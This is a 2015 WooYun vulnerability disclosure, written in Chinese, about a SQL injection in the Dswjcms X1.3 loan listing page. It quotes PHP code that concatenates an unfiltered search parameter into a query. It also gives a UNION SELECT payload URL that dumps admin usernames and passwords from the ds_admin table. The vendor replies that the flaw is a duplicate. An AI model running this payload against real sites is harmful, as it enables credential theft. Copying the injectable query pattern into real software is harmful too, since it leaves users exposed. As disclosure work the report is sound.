当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143741

漏洞标题: Dswjcms! X1.3 sql注入#3

相关厂商:dswjcms.com

漏洞作者: 不能忍

提交时间:2015-10-12 11:12

修复时间:2016-01-10 17:19

公开时间:2016-01-10 17:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-10: 细节向公众公开

简要描述:

Dswjcms! X1.3

详细说明:

漏洞文件:/Lib/Action/Home/LoanAction.class.php

public function index(){
$Borrowing = D('Borrowing');
import('ORG.Util.Page');// 导入分页类
$where='(state=1 or state=5 or state=7 or state=9)';
if($this->_get('search')){
$where.=" and `title` LIKE '%".$this->_get('search')."%'";//获取之后是直接进库的
}
$count = $Borrowing->where($where)->count();// 查询满足要求的总记录数
$Page = new Page($count,10);// 实例化分页类 传入总记录数和每页显示的记录数数
$show = $Page->show();// 分页显示输出
$borrow=$this->borrow_unicoms($where,$Page->firstRow.','.$Page->listRows,'`stick` DESC,`time` DESC');
$this->assign('borrow',$borrow);
$this->assign('page',$show);// 赋值分页输出
//标题、关键字、描述
$Site = D("Site");
$site=$Site->field('keyword,remark,title,link')->where('link="'.$_SERVER['REQUEST_URI'].'"')->find();
$this->assign('si',$site);
$active['loan']='active';
$this->assign('active',$active);
$endjs='


没过滤的,给个payload:
http://localhost/Loan/index/?search=sefseef%') UNION SELECT concat(username,0x2c,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from ds_admin%23

漏洞证明:

1.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-10 17:19

厂商回复:

该漏洞之前已被其它作者发现,并已修复,参考:http://www.wooyun.org/bugs/wooyun-2015-

最新状态:

暂无